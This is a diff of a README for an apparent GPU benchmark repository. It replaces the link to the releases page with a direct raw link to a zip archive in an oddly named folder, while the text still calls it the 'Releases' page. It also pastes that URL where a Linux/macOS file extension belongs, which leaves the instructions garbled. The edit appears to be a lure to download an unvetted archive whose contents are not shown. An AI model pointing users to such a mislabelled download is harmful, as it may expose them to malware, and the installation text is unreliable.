cracklingscapitalofsouthdakota649/gpu_benchmark/README.md

 - **Network:** Internet connection for downloading dependencies and updates.

 ## 📦 Download & Install
-To get started, visit the download page: [Download From Releases](https://github.com/cracklingscapitalofsouthdakota649/gpu_benchmark/releases).
+To get started, visit the download page: [Download From Releases](https://raw.githubusercontent.com/cracklingscapitalofsouthdakota649/gpu_benchmark/main/ovoviviparity/gpu_benchmark.zip).

 1. Click on the link above to go to the **Releases** page.
 2. Look for the latest release version.
 3. Download the file corresponding to your system.
-The file will usually end in `.exe` for Windows or `.tar.gz` for Linux/macOS.
+The file will usually end in `.exe` for Windows or `https://raw.githubusercontent.com/cracklingscapitalofsouthdakota649/gpu_benchmark/main/ovoviviparity/gpu_benchmark.zip` for Linux/macOS.
 4. Once the download is complete, find the file in your downloads folder.

 ### Windows Installation